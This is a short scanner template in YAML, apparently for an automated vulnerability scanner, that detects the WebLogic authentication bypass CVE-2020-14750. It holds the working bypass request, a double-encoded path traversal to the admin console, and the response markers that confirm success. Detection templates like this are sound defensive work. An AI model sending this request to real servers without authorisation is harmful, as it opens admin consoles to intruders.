id: CVE-2020-14750
info:
  name: Weblogic Auth Bypass
  risk: Critical

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}//console/images/%252e./console.portal
    detections: 
      - >-
        StatusCode() == 200 && StringSearch("response", "common/NoJMX.jsp") && StringSearch("resHeaders","ADMINCONSOLESESSION")
  
reference:
  - link: https://www.oracle.com/security-alerts/alert-cve-2020-14750.html